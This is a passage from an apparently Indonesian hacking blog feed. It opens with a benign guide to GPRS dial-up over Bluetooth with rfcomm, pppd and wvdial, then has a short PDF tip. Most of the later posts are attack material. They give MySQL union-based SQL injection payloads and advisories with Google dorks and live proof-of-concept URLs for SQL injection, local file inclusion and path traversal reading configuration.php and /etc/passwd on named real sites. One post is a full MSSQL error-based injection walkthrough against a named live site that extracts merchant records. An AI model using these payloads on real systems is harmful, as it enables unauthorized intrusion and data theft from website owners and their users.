/>6. Konfigurasi rfcomm<br /><br /># rfcomm bind 0 <alamat_device> <channel><br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # rfcomm bind 0 00:0E:6D:79:CA:FB 1<br />root@anderson:~ # rfcomm show<br />rfcomm0: 00:0E:6D:79:CA:FB channel 1 clean<br />-------------------- END ---------------------<br /><br />Salah ketik dan terlanjur enter ??<br />Release aza. Caranya:<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # rfcomm release 0<br />-------------------- END ---------------------<br /><br />7. Konfigurasi File GPRS<br /><br />Buat file dengan nama "gprs" (nama file boleh beda) dan simpan di "/etc/ppp/peers/"<br /><br />----------------- ISI FILE ------------------<br />nodetach<br />debug<br />show-password<br />connect "/usr/bin/wvdial --chat --config /etc/ppp/peers/gprs-wvdial.conf gprs"<br />disconnect /etc/ppp/peers/gprs-disconnect-chat<br />/dev/rfcomm0<br />115200<br />crtscts<br />local<br />:10.0.0.1<br />noipdefault<br />ipcp-accept-local<br />usepeerdns<br />novj<br />nobsdcomp<br />novjccomp<br />nopcomp<br />noaccomp<br />noauth<br />defaultroute<br />user ""<br />-------------------- END ---------------------<br /><br />Isi dari baris "user" disesuaikan.<br /><br />8. Konfigurasi File GPRS WvDial<br /><br />Buat file dengan nama "gprs-wvdial.conf" (nama file boleh beda) dan simpan di "/etc/ppp/peers/"<br /><br />------------------ ISI FILE -------------------<br />[Dialer gprs]<br />Init1 = ATH<br />Init2 = ATE1<br />Init3 = AT+CGDCONT=1,"IP","www.indosat-m3.net","",0,0<br />Dial Command = ATD<br />Phone = *99#<br />Username ="gprs"<br />Password ="im3"<br />-------------------- END ---------------------<br /><br />Isi dari baris "Phone" bisa juga diisi dengan *99***1#<br />Silahkan sesuaikan baris-baris yang lain dengan setingan gprs dari provider yang anda gunakan.<br /><br />9. Konfigurasi File GPRS Disconnect Chat<br /><br />Buat file dengan nama "gprs-disconnect-chat" (nama file boleh beda) dan simpan di "/etc/ppp/peers/"<br /><br />------------------ ISI FILE -------------------<br />#!/bin/sh<br />exec /usr/sbin/chat -V -s -S<br />ABORT "BUSY"<br />ABORT "ERROR"<br />ABORT "NO DIALTONE"<br />SAY "nSending break to the modemn"<br />"" "K"<br />"" "+++ATH"<br />SAY "nPDP context detachedn"<br />-------------------- END ---------------------<br /><br />Jangan lupa:<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # chmod +x /etc/ppp/peers/gprs-disconnect-chat<br />-------------------- END ---------------------<br /><br />10. Check Konfigurasi<br /><br />* /etc/ppp/peers/gprs<br />* /etc/ppp/peers/gprs-wvdial.conf<br />* /etc/ppp/peers/gprs-disconnect-chat<br /><br />Sudah semua ???<br /><br />Oh ya ... nama file memang boleh dibuat beda dari contoh yang ada,<br />dengan syarat musti saling berhubungan ba*an :P<br /><br />11. Connect to Internet<br /><br />----------------- CONSOLE ------------------<br />anderson:/etc/ppp/peers # pppd call gprs<br />--> WvDial: Internet dialer version 1.54.0<br />--> Initializing modem.<br />--> Sending: ATH<br />NO CARRIER<br />ATH<br />OK<br />--> Sending: ATE1<br />ATE1<br />OK<br />--> Sending: AT+CGDCONT=1,"IP","www.indosat-m3.net","",0,0<br />AT+CGDCONT=1,"IP","www.indosat-m3.net","",0,0<br />OK<br />--> Modem initialized.<br />--> Sending: ATD*99#<br />--> Waiting for carrier.<br />ATD*99#<br />CONNECT<br />~[7f]}#@!}!} } }2}#}$@#}!}$}%\}"}&} }*} } g}%~<br />--> Carrier detected. Waiting for prompt.<br />~[7f]}#@!}!} } }2}#}$@#}!}$}%\}"}&} }*} } g}%~<br />--> PPP negotiation detected.<br />Serial connection established.<br />using channel 10<br />Using interface ppp0<br />Connect: ppp0 <--> /dev/rfcomm0<br />sent [LCP ConfReq id=0x1 <asyncmap> <magic>]<br />rcvd [LCP ConfRej id=0x1 <magic>]<br />sent [LCP ConfReq id=0x2 <asyncmap>]<br />rcvd [LCP ConfAck id=0x2 <asyncmap>]<br />rcvd [LCP ConfReq id=0x0 <auth> <mru> <asyncmap>]<br />No auth is possible<br />sent [LCP ConfRej id=0x0 <auth>]<br />rcvd [LCP ConfReq id=0x1 <mru> <asyncmap>]<br />sent [LCP ConfAck id=0x1 <mru> <asyncmap>]<br />sent [LCP EchoReq id=0x0 magic=0x0]<br />sent [CCP ConfReq id=0x1 <deflate> <deflate(old#)>]<br />sent [IPCP ConfReq id=0x1 <addr> <ms-dns1> <ms-dns3>]<br />rcvd [IPCP ConfReq id=0x0 <addr>]<br />sent [IPCP ConfNak id=0x0 <addr>]<br />rcvd [LCP EchoRep id=0x0 magic=0x0]<br />rcvd [LCP ProtRej id=0x0 80 fd 01 01 00 0c 1a 04 78 00 18 04 78 00]<br />rcvd [IPCP ConfNak id=0x1 <addr> <ms-dns1> <ms-dns3>]<br />sent [IPCP ConfReq id=0x2 <addr> <ms-dns1> <ms-dns3>]<br />rcvd [IPCP ConfReq id=0x1 <addr>]<br />sent [IPCP ConfAck id=0x1 <addr>]<br />rcvd [IPCP ConfAck id=0x2 <addr> <ms-dns1> <ms-dns3>]<br />local IP address 10.37.12.123<br />remote IP address 10.0.0.1<br />primary DNS address 124.195.15.100<br />secondary DNS address 124.195.15.98<br />Script /etc/ppp/ip-up started (pid 6220)<br />Script /etc/ppp/ip-up finished (pid 6220), status = 0x0<br />-------------------- END ---------------------<br /><br />Udah Connect ....<br />Tekan CTRL-C untuk Disconnect in anytime in anyplace .. weksss ....<br /><br />Seterusnya kamu hanya perlu melakukan langkah di bawah ini ...<br /><br />----------------- CONSOLE ------------------<br />root@anderson:~ # hcitool scan<br />root@anderson:~ # rfcomm bind 0 00:0E:6D:79:CA:FB 1<br />root@anderson:~ # pppd call gprs<br />-------------------- END ---------------------<br /><br />FINISH !!!<br />=======<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-7063369498970169066?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-215115958405179212008-12-05T21:37:00.000+07:002008-12-13T02:07:42.044+07:00Copy Teks dari Dokumen PDFAda beberapa file dokumen pdf yang saya download, trus mau saya copy beberapa teks yang ada ... eh menu copy dr klik kanan ama ctrl+c na ndak maw -_-<br />Kebetulan saya ndak punya software buat convert dari .pdf ke .doc<br />ya dah saya coba print ulang pake software PDF Printer Driver (yg saya pake doPDF - <a class="weblink" href="http://www.dopdf.com/" target="_blank">www.dopdf.com</a>) begitu jadi duplikat pdf na, saya coba lagi klik kanan trus copy... eh bisa xixixixi ...<br />dasar newbie -_- tapi mayan ilmu na kan ?? dikid² jadi bukit loh wekekkek....<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-21511595840517921?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-39857713887024365992008-11-21T11:30:00.000+07:002008-12-13T02:09:29.004+07:00Tip & Trik MySQL Injection (PHP)MySQL Version: 5.x.x<br />Trick Title: Olah Tabel & Kolom<br /><br />Munculkan Semua Tabel: union select group_concat(table_name) from information_schema.tables where table_schema=database()--<br /><br />Munculkan Semua Kolom: union select group_concat(column_name) from information_schema.columns where table_schema=database()--<br /><br />atau<br /><br />Bisa juga: union select group_concat(column_name) from information_schema.columns where table_name='nama_tabel'--<br /><br />Catatan:<br />Kalo tabel/kolom nya kebanyakan, kemungkinan besar gag akan muncul semua nya (kepotong) o.O<br /><br />====================================<br /><br />MySQL Version: 4.x.x - 5.x.x<br />Trick Title: Olah Data (concat)<br /><br />Munculkan semua data : group_concat(nama_kolom)<br /><br />Munculkan pake separator: concat_ws(separator,nama_kolom1,nama_kolom2)<br />Contoh: concat_ws(0x3a,username,password,email)<br /><br />Keterangan:<br /><br />separator = char/hex<br /><br />====================================<br /><br />Sekian dulu xixixixi ...<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-3985771388702436599?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-57109787200428638582008-11-21T11:23:00.000+07:002008-12-13T02:06:33.596+07:00Flosites Blog SQL Vuln[-] Title : Multiple Remote SQL Injection Vulnerabilities<br />[-] Software : Flosites Blog<br />[-] Vendor : www.flosites.com<br />[-] Date : 17 November 2008 (Indonesia)<br /><br />[+] Google Dork<br /><br /> "blog by flosites"<br /><br />[+] Exploit<br /><br /> http://[site]/[path]/index.php?cat=-1 [SQL]/*<br /> http://[site]/[path]/index.php?category=-1 [SQL]/*<br /><br />[+] Proof of Concept<br /><br /> http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*<br /> http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-5710978720042863858?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-60688717305148305442008-11-05T18:33:00.000+07:002008-12-13T02:06:33.597+07:00MyForum 1.3 Multiple VulnSoftware : MyForum 1.3<br />Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip<br />Date : 27 Oktober 2008<br /><br />SQL Injection Exploit:<br />http://www.milw0rm.com/exploits/6844<br /><br />LFI Vuln:<br />http://www.milw0rm.com/exploits/6846<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-6068871730514830544?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-70886553766103609962008-11-05T18:31:00.000+07:002008-12-13T02:06:33.597+07:00RWCards 3.0.11 LFI VulnSoftware : RWCards 3.0.11 Component for Joomla 1.5 CMS<br />Vendor : http://www.weberr.de/<br />Date : 23 Oktober 2008<br /><br />[»] Google Dork<br /><br /> inurl:com_rwcards<br /><br />[»] Vulnerable<br /><br /> ./components/com_rwcards/captcha/captcha_image.php<br /><br /> 15: if (!empty( $_GET['img'] ) )<br /> 16: $img = $_GET['img'];<br /> 17: else<br /> 18: {<br /> 19: echo 'no image file specified via &img=...';<br /> 20: exit;<br /> 21: }<br /> 22:<br /> 23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb'))<br /> 24: {<br /> 25: echo 'could not open image file!';<br /> 26: }<br /> 27: else<br /> 28: { <br /> 29: fpassthru( $fh );<br /> 30: fclose( $fh );<br /> 31: } <br /><br />[»] Exploit<br /><br /> http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]<br /><br />[»] Proof of Concept<br /><br /> http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]<br /> http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-7088655376610360996?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-90084258209914951182008-11-05T18:27:00.001+07:002008-12-13T02:06:33.598+07:00ionFiles 4.4.2 FD VulnFile Disclosure Vulnerability<br />Software : ionFiles 4.4.2 Component for Joomla! CMS<br />Vendor : http://forum.codecall.net/<br />Date : 23 Oktober 2008<br /><br />[»] Google Dork<br /><br /> inurl:com_ionfiles<br /><br />[»] Vulnerable<br /><br /> ./download.php<br /> <br /> Line 32: $file = $_GET['file'];<br /> Line 33: $download = $_GET['download'];<br /> Line 66 - 91<br /><br />[»] Exploit<br /><br /> http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1<br /><br />[»] Proof of Concept<br /><br /> http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1<br /> http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-9008425820991495118?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-48131639285745386112008-11-05T18:16:00.000+07:002008-12-13T02:06:33.598+07:00yappa-ng 2.3.2 LFI Vuln (old)Software : yappa-ng Version 2.3.2<br />Vendor : http://www.zirkon.at/<br />Date : 19 Oktober 2008<br /><br />[»] Google Dork<br /><br /> "Powered by yappa-ng 2.3.2"<br /><br />[»] Exploit<br /><br /> http://[site]/[yappa-ng-path]/index.php?album=[LFI]<br /><br />[»] Proof of Concept<br /><br /> http://www.zirkon.at/yappa-ng_demo/index.php?album=[LFI]<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-4813163928574538611?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com0tag:blogger.com,1999:blog-5676546943449335880.post-42159931305977233912008-11-05T15:29:00.001+07:002008-12-13T02:09:29.005+07:00ASP MsSQL InjectionLangsung aja !!!<br /><br />Contoh Web Yang Vuln :<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12<br /><br />CEK VULN / GAK !!!<br />==================<br /><br />Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'<br /><br />Jika Error nya seperti ini :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e14'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.<br />/main/ListPosts.asp, line 56<br /><br />Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!<br />Selain SQL Server Driver (Provider) ndak tau deh gua :D<br /><br />maka Lanjut ...<br /><br />CARI STRUKTUR TABEL !!!<br />=======================<br /><br />1) Debugging<br /><br />Debugging di sini untuk memunculkan pesan error dr MsSQL.<br /><br />SQL Inject nya adalah "and 1="<br /><br />2) Munculkan nama tabel<br /><br />Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables))--<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--<br /><br />Error yang muncul adalah :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />bisa dilihat di situ kita dapat tabel dengan nama "Merchants".<br /><br />berbeda dgn MySQL, MsSQL dalam output nya membedakan tipe data, sehingga kita perlu mengkonversi nya agar SQL dapat memunculkan pesan error yang kita inginkan.<br /><br />skrg kita cari tabel selanjut nya.<br /><br />Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--<br /><br />Error yang muncul :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />Bisa di lihat Query nya berbeda dgn MySQL. MySQL ndak support "not in" sedangkan MsSQL support "not in" ^^<br /><br />nah dapat tabel dgn nama "category" .... kita coba cari lagi tabel selanjut nya.<br /><br />Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--<br /><br />Error yng muncul :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />dapat tabel dgn nama "Codes". Silahkan cari lagi nama tabel yang di inginkan.<br /><br />CARI STRUKTUR COLUMN !!!<br />========================<br /><br />Contoh kita mau cari column yg ada di tabel "Merchants".<br /><br />Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--<br /><br />Error yg muncul :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />dapat deh column dgn nama "merchantId" ... yok cari lagi column laen :D<br /><br />QUery : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--<br /><br />Error yg muncul :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />dapat deh column "address". cari lage column ne ...<br /><br />Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--<br /><br />Error yg muncul:<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />dapat tuh column "merchantName" ekkekekeke ....<br /><br />Silahkan kalo mo nyari lagi ^^<br /><br />PENGAMBILAN DATA !!!<br />====================<br /><br />Contoh kita mau lihat isi dari column "merchantid, address, merchantName" yg ada di tabel "Merchants".<br /><br />Query : and 1=convert(int,(select top 1 merchantid from merchants))--<br /><br />http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--<br /><br />Error yg muncul :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />dapat "merchantid" = "alohacc".<br /><br />nah gmn kalo mau ngambil isi column ne sekaligus ??<br /><br />Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--<br /><br />Error yg muncul :<br /><br />Microsoft OLE DB Provider for ODBC Drivers error '80040e07'<br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.<br />/main/ListPosts.asp, line 56<br /><br />Note : %2b = + sedangkan ':' = pembatas<br /><br />FINISH !!!<br />==========<br />____________________________________________________________<br />"Kegantengan Sejati yg Muncul dr relung Hati yg Paling Dalam"<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5676546943449335880-4215993130597723391?l=c0li.blogspot.com' alt='' /></div>Andersonnoreply@blogger.com2